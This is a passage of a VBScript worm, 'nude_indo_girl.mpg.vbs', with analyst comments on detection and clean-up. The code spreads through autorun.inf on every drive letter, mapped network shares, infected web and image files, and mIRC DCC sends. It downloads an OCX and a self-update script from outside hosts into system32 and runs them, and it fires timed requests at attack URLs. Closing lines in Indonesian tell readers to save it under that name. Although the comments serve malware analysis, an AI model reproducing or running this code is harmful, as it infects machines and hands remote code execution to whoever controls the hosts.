Set fso = CreateObject("Scripting.FileSystemObject")
'Mode 8 = append, True = create if absent; relative to the current directory.
Set file = fso.OpenTextFile("autorun.inf", 8, True)
file.WriteLine(isi)
file.Close
SET file = NOTHING
mywisdom.run("attrib +r autorun.inf")
mywisdom.run("attrib +r nude_indo_girl.mpg.vbs")

'Folder the script is running from; source of both files copied below.
win = fso.GetParentFolderName(Wscript.ScriptFullName)

autorun= win & "\autorun.inf"

'Destination paths for the worm body.
satu= win & "\nude_indo_girl.mpg.vbs"
dua = "c:\WINDOWS\nude_indo_girl.mpg.vbs"
tiga = "c:\nude_indo_girl.mpg.vbs"
empat = "c:\windows\nude_indo_girl.mpg.vbs"
lima = "c:\windows\system32\nude_indo_girl.mpg.vbs"
enam = "c:\xampp\htdocs\nude_indo_girl.mpg.vbs"
d= "d:\nude_indo_girl.mpg.vbs"
e="e:\nude_indo_girl.mpg.vbs"
f="f:\nude_indo_girl.mpg.vbs"
g="g:\nude_indo_girl.mpg.vbs"
h="h:\nude_indo_girl.mpg.vbs"
i= "i:\nude_indo_girl.mpg.vbs"
j= "j:\nude_indo_girl.mpg.vbs"
k= "k:\nude_indo_girl.mpg.vbs"
l= "l:\nude_indo_girl.mpg.vbs"
m= "m:\nude_indo_girl.mpg.vbs"
n= "n:\nude_indo_girl.mpg.vbs"
o= "o:\nude_indo_girl.mpg.vbs"
p= "p:\nude_indo_girl.mpg.vbs"
q= "q:\nude_indo_girl.mpg.vbs"
r= "r:\nude_indo_girl.mpg.vbs"
s= "s:\nude_indo_girl.mpg.vbs"
t= "t:\nude_indo_girl.mpg.vbs"
u= "u:\nude_indo_girl.mpg.vbs"
v= "v:\nude_indo_girl.mpg.vbs"
w= "w:\nude_indo_girl.mpg.vbs"
x= "x:\nude_indo_girl.mpg.vbs"
y= "y:\nude_indo_girl.mpg.vbs"
z= "z:\nude_indo_girl.mpg.vbs"

'One copy attempt per destination; drive letters that do not exist just fail.
fso.CopyFile satu, dua, 0
fso.CopyFile satu, tiga, 0
fso.CopyFile satu, empat, 0
fso.CopyFile satu, lima, 0
fso.CopyFile satu, enam, 0
fso.CopyFile satu, d, 0
fso.CopyFile satu, e, 0
fso.CopyFile satu, f, 0
fso.CopyFile satu, g, 0
fso.CopyFile satu, h, 0
fso.CopyFile satu, i, 0
fso.CopyFile satu, j, 0
fso.CopyFile satu, k, 0
fso.CopyFile satu, l, 0
fso.CopyFile satu, m, 0
fso.CopyFile satu, n, 0
fso.CopyFile satu, o, 0
fso.CopyFile satu, p, 0
fso.CopyFile satu, q, 0
fso.CopyFile satu, r, 0
fso.CopyFile satu, s, 0
fso.CopyFile satu, t, 0
fso.CopyFile satu, u, 0
fso.CopyFile satu, v, 0
fso.CopyFile satu, w, 0
fso.CopyFile satu, x, 0
fso.CopyFile satu, y, 0
fso.CopyFile satu, z, 0

'Destination paths for autorun.inf, mirroring the list above.
duax = "c:\WINDOWS\autorun.inf"
tigax = "c:\autorun.inf"
empatx = "c:\windows\autorun.inf"
limax = "c:\windows\system32\autorun.inf"
enamx = "c:\xampp\htdocs\autorun.inf"
dx= "d:\autorun.inf"
ex="e:\autorun.inf"
fx="f:\autorun.inf"
gx="g:\autorun.inf"
hx="h:\autorun.inf"
ix= "i:\autorun.inf"
jx= "j:\autorun.inf"
kx= "k:\autorun.inf"
lx= "l:\autorun.inf"
mx= "m:\autorun.inf"
nx= "n:\autorun.inf"
ox= "o:\autorun.inf"
px= "p:\autorun.inf"
qx= "q:\autorun.inf"
rx= "r:\autorun.inf"
sx= "s:\autorun.inf"
tx= "t:\autorun.inf"
ux= "u:\autorun.inf"
vx= "v:\autorun.inf"
wx= "w:\autorun.inf"
xx= "x:\autorun.inf"
yx= "y:\autorun.inf"
zx= "z:\autorun.inf"

fso.CopyFile autorun, duax, 0
fso.CopyFile autorun, tigax, 0
fso.CopyFile autorun, empatx, 0
fso.CopyFile autorun, limax, 0
fso.CopyFile autorun, enamx, 0
fso.CopyFile autorun, dx, 0
fso.CopyFile autorun, ex, 0
fso.CopyFile autorun, fx, 0
fso.CopyFile autorun, gx, 0
fso.CopyFile autorun, hx, 0
fso.CopyFile autorun, ix, 0
fso.CopyFile autorun, jx, 0
fso.CopyFile autorun, kx, 0
fso.CopyFile autorun, lx, 0
fso.CopyFile autorun, mx, 0
fso.CopyFile autorun, nx, 0
fso.CopyFile autorun, ox, 0
fso.CopyFile autorun, px, 0
fso.CopyFile autorun, qx, 0
fso.CopyFile autorun, rx, 0
fso.CopyFile autorun, sx, 0
fso.CopyFile autorun, tx, 0
fso.CopyFile autorun, ux, 0
fso.CopyFile autorun, vx, 0
fso.CopyFile autorun, wx, 0
fso.CopyFile autorun, xx, 0
fso.CopyFile autorun, yx, 0
fso.CopyFile autorun, zx, 0
end sub

'network spreading technique taken from csw
'Analyst summary: a sub with the same name and body also appears earlier in
'this listing. It copies the running script to "nude_indo_girl.mpg.vbs" in
'the current directory and passes each non-empty EnumNetworkDrives entry to
'Dosearch.
'NOTE(review): Dosearch is not defined in this part of the listing - confirm
'what it does with the share before sizing the clean-up.
'Detection: script host processes writing .vbs files to mapped drives.
Sub NetSpread()
On Error Resume Next
Set Network = CreateObject("WScript.Network")
Set Shares = Network.EnumNetworkDrives
If Shares.Count > 0 Then
Set fso = CreateObject("Scripting.FileSystemObject")
For Counter1 = 0 To Shares.Count - 1
If Shares.Item(Counter1) <> "" Then
fso.getFile(wscript.ScriptFullName).Copy("nude_indo_girl.mpg.vbs")
Dosearch (Shares.Item(Counter1))
End If
Next
Set fso = Nothing
End If
Set Shares = Nothing
Set Network = Nothing
End Sub

'Analyst summary: a sub with the same name and body also appears earlier in
'this listing. For each php, html, htm, jsp, jpg, gif or png file in the
'script's folder it appends the worm's own text plus a window.open(...) line.
'Detection: content files in a web root ending in
'window.open('nude_indo_girl.mpg.vbs'); - file-integrity monitoring will also
'show the size change.
'Remediation: restore affected files from backup.
sub infek_file_dan_web()
On Error Resume Next
Dim fso,ekstensi, folder, files, NewsFile,sFolder
Set fso = CreateObject("Scripting.FileSystemObject")
sFolder = fso.GetParentFolderName(Wscript.ScriptFullName)
Set folder = fso.GetFolder(sFolder)
Set files = folder.Files
For each folderIdx In files
ekstensi=fso.GetExtensionName(folderIdx.Name)
if ekstensi="php" or ekstensi="html" or ekstensi="htm" or ekstensi="jsp" or ekstensi="jpg" or ekstensi="jsp" or ekstensi="gif" or ekstensi="png" then
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.GetFile("nude_indo_girl.mpg.vbs")
Set objReadFile = objFSO.OpenTextFile("nude_indo_girl.mpg.vbs", 1)
strContents = objReadFile.ReadAll

Set mywisdom = CreateObject("WScript.Shell")
'Mode 8 = append, True = create if absent.
Set file = fso.OpenTextFile(folderIdx.Name, 8, True)
tag1=""
tag2="window.open('nude_indo_girl.mpg.vbs');"
strContents=tag1+strContents+tag2
file.WriteLine(strContents)
file.Close
objReadFile.Close
SET file = NOTHING
end if

Next
NewFile.Close

end sub

'Analyst summary: downloads a file named MSWINSCK.OCX (the file name of the
'Microsoft Winsock ActiveX control) over plain HTTP and saves it as
'c:\windows\system32\MSWINSCK.OCX, deleting any file already at that path.
'The routine performs no check on what it received, so on an affected host
'that file is whatever the remote server returned at the time.
'Detection: a script host process fetching an .OCX over HTTP and writing into
'system32; MSXML2.XMLHTTP combined with ADODB.Stream.SaveToFile in a script is
'a common downloader pattern worth alerting on.
'Remediation: treat system32\MSWINSCK.OCX as untrusted and replace it from
'known-good media if the control is needed.
sub download_winsock()
strFileURL = "http://ardiantz.com/~checking/wp-includes/MSWINSCK.OCX"
strHDLocation = "c:\windows\system32\MSWINSCK.OCX"

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

'Synchronous request (third argument false).
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
'Type 1 = binary stream.
objADOStream.Type = 1

objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0

'Any existing file at the destination is removed before saving.
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing
end sub

'Analyst summary: second download location for the same file. Fetches
'MSWINSCK.OCX over plain HTTP from yoyoparty.com and saves it as
'c:\windows\system32\MSWINSCK.OCX, deleting any file already at that path.
'No check is made on the downloaded content.
'Detection: HTTP GET for /upload/MSWINSCK.OCX on that host from a script host
'process, followed by a write into system32.
sub download_winsock2()
strFileURL = "http://yoyoparty.com/upload/MSWINSCK.OCX"
strHDLocation = "c:\windows\system32\MSWINSCK.OCX"

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

'Synchronous request (third argument false).
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
'Type 1 = binary stream.
objADOStream.Type = 1

objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0

Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing
end sub

'Analyst summary: the listing defines download_winsock2 a second time with the
'same body: HTTP download of MSWINSCK.OCX from yoyoparty.com into
'c:\windows\system32, replacing any existing file, with no check on the
'downloaded content.
'Detection: HTTP GET for /upload/MSWINSCK.OCX on that host from a script host
'process, followed by a write into system32.
sub download_winsock2()
strFileURL = "http://yoyoparty.com/upload/MSWINSCK.OCX"
strHDLocation = "c:\windows\system32\MSWINSCK.OCX"

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
'Type 1 = binary stream.
objADOStream.Type = 1

objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0

Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing
end sub

'Analyst summary: writes C:\Program Files\mIRC\script.ini containing an
'on-JOIN handler: whenever someone other than the local user joins a channel,
'the client is told to DCC-send the worm file to that nick. The leading dot in
'"/.dcc" is mIRC's quiet prefix, so the command's output is not shown to the
'user.
'Detection: a script.ini in the mIRC folder containing "/.dcc send $nick"
'followed by a .vbs path; unexpected outbound DCC sends on channel joins.
'Mitigation: on the receiving side, refuse DCC transfers of script file
'types; on an affected host, replace script.ini with a known-good copy.
sub sebar_ke_irc_1()
Set fso = CreateObject("Scripting.FileSystemObject")
'Full path of the running script; embedded verbatim in the DCC command below.
nama_w0rm=Wscript.ScriptFullName

win = fso.GetParentFolderName(Wscript.ScriptFullName)

set scriptini=fso.CreateTextFile("C:\Program Files\mIRC\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine ";"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick " & nama_w0rm
scriptini.WriteLine "n3=}"
end sub

'Analyst summary: when the local minute equals 12, sends eleven synchronous
'GET requests to iframe.php on ardiantz.com. The response is not read.
'NOTE(review): what iframe.php does server-side is not visible in this
'listing; the infected host only acts as the requester.
'Network indicator: GET /~checking/wp-includes/iframe.php from a script host.
sub iframe_attack()
jam=Hour(Now())
menit=Minute(Now())
if menit=12 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/iframe.php", False
o.send
next
end if
end sub

'Analyst summary: when the local minute equals 35, sends six synchronous GET
'requests to wget1.php on ardiantz.com and stores the HTTP status in a
'variable that is not used afterwards.
'NOTE(review): what wget1.php does server-side is not visible in this listing.
'Network indicator: GET /~checking/wp-includes/wget1.php from a script host.
sub wget_attack1()
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget1.php", False
o.send
data=o.status
next
end if
end sub

'Analyst summary: when the local minute equals 35, sends six synchronous GET
'requests to wget2.php on ardiantz.com and stores the HTTP status in a
'variable that is not used afterwards.
'NOTE(review): what wget2.php does server-side is not visible in this listing.
'Network indicator: GET /~checking/wp-includes/wget2.php from a script host.
sub wget_attack2()
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget2.php", False
o.send
data=o.status
next
end if
end sub

'Analyst summary: when the local minute equals 35, sends six synchronous GET
'requests to wget3.php on ardiantz.com and stores the HTTP status in a
'variable that is not used afterwards.
'NOTE(review): what wget3.php does server-side is not visible in this listing.
'Network indicator: GET /~checking/wp-includes/wget3.php from a script host.
sub wget_attack3()
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget3.php", False
o.send
data=o.status
next
end if
end sub

'Analyst summary: when the local minute equals 35, sends six synchronous GET
'requests to wget4.php on ardiantz.com and stores the HTTP status in a
'variable that is not used afterwards.
'NOTE(review): what wget4.php does server-side is not visible in this listing.
'Network indicator: GET /~checking/wp-includes/wget4.php from a script host.
sub wget_attack4()
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget4.php", False
o.send
data=o.status
next
end if
end sub

'Analyst summary: when the local minute equals 35, sends six synchronous GET
'requests to wget5.php on ardiantz.com and stores the HTTP status in a
'variable that is not used afterwards.
'NOTE(review): what wget5.php does server-side is not visible in this listing.
'Network indicator: GET /~checking/wp-includes/wget5.php from a script host.
sub wget_attack5()
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget5.php", False
o.send
data=o.status
next
end if
end sub

'Analyst summary: during local hours 12, 13 and 23, starts five visible
'Internet Explorer windows through COM automation, one per hard-coded site
'(tbd.my, hmsecurity.org, v4-team.com, sec-r1z.com, ardiantz.com), each sized
'850x720 with all toolbars shown.
'User-visible symptom: browser windows to these sites opening on their own -
'a useful question for help-desk triage of suspected infections.
'Detection: iexplore.exe instances created via COM with a script host as the
'originating process.
sub browsing()
dim Window
jam=Hour(Now())
menit=Minute(Now())
hari=Day(now())

if jam=12 or jam=13 or jam=23 then
set Window = CreateObject("InternetExplorer.Application")
Window.RegisterAsBrowser = True
Window.Navigate("tbd.my")
Window.MenuBar = True
Window.ToolBar = True
Window.AddressBar = True
Window.StatusBar = True
Window.FullScreen = False
Window.Resizable = True
Window.Visible = True
Window.Width = 850
Window.Height = 720

set Window2 = CreateObject("InternetExplorer.Application")
Window2.RegisterAsBrowser = True
Window2.Navigate("hmsecurity.org")
Window2.MenuBar = True
Window2.ToolBar = True
Window2.AddressBar = True
Window2.StatusBar = True
Window2.FullScreen = False
Window2.Resizable = True
Window2.Visible = True
Window2.Width = 850
Window2.Height = 720

set Window3 = CreateObject("InternetExplorer.Application")
Window3.RegisterAsBrowser = True
Window3.Navigate("v4-team.com")
Window3.MenuBar = True
Window3.ToolBar = True
Window3.AddressBar = True
Window3.StatusBar = True
Window3.FullScreen = False
Window3.Resizable = True
Window3.Visible = True
Window3.Width = 850
Window3.Height = 720

set Window4 = CreateObject("InternetExplorer.Application")
Window4.RegisterAsBrowser = True
Window4.Navigate("sec-r1z.com")
Window4.MenuBar = True
Window4.ToolBar = True
Window4.AddressBar = True
Window4.StatusBar = True
Window4.FullScreen = False
Window4.Resizable = True
Window4.Visible = True
Window4.Width = 850
Window4.Height = 720

set Window5 = CreateObject("InternetExplorer.Application")
Window5.RegisterAsBrowser = True
Window5.Navigate("ardiantz.com")
Window5.MenuBar = True
Window5.ToolBar = True
Window5.AddressBar = True
Window5.StatusBar = True
Window5.FullScreen = False
Window5.Resizable = True
Window5.Visible = True
Window5.Width = 850
Window5.Height = 720
end if
end sub

'Analyst summary: self-update channel. At local hour 10 on day 10 of the
'month, downloads patch.vbs over plain HTTP from ardiantz.com and saves it as
'c:\windows\system32\patch.vbs, replacing any existing file. Independently of
'that date check, every call ends by running c:\windows\system32\patch.vbs.
'Risk: whoever controls that URL can run arbitrary script on every infected
'host; the content is not checked in any way before it is executed.
'Detection: system32\patch.vbs on disk; a script host launching it; HTTP GET
'for /~checking/wp-includes/patch.vbs.
'Containment: blocking the download URL at the proxy closes the update path
'while hosts are being cleaned.
sub download_update_worm1()

jam=Hour(Now())
menit=Minute(Now())
hari=Day(now())

if jam=10 and hari=10 then
strFileURL = "http://ardiantz.com/~checking/wp-includes/patch.vbs"
strHDLocation = "c:\windows\system32\patch.vbs"

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

'Synchronous request (third argument false).
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
'Type 1 = binary stream.
objADOStream.Type = 1

objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0

Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing

end if

'Runs outside the date check: executed on every call of this sub.
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("c:\windows\system32\patch.vbs")
end sub

klo udah save dengan nama nude_indo_girl.mpg.vbs (nama file tdk boleh diubah)

klo ga mu kompi agan kena jangan di klik yaa...
